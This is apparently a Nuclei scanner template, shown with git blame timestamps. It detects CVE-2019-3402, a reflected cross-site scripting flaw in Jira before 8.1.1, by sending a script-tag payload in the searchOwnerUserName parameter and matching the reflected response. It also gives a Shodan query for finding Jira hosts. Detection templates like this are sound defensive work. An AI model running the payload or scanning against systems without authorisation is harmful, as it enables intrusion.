2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-3402
|
2020-11-06 10:28:11 +00:00
|
|
|
|
|
|
|
info:
|
2022-10-26 06:24:30 +00:00
|
|
|
name: Jira < 8.1.1 - Cross-Site Scripting
|
2020-11-06 10:28:11 +00:00
|
|
|
author: pdteam
|
|
|
|
severity: medium
|
2022-10-26 06:24:30 +00:00
|
|
|
description: |
|
|
|
|
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://jira.atlassian.com/browse/JRASERVER-69243
|
2022-09-08 13:28:46 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-3402
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-3402
|
|
|
|
cwe-id: CWE-79
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.00238
|
|
|
|
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
|
2022-07-04 13:18:38 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-10-26 06:24:30 +00:00
|
|
|
verified: true
|
2022-07-04 13:18:38 +00:00
|
|
|
shodan-query: http.component:"Atlassian Jira"
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: atlassian
|
|
|
|
product: jira
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2019,atlassian,jira,xss
|
2020-11-06 10:28:11 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2020-11-06 10:28:11 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-06-09 18:31:38 +00:00
|
|
|
- "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
|
2020-11-06 10:28:11 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-10-26 06:24:30 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "'<script>alert(1)</script>' does not exist"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
2020-11-06 10:28:11 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|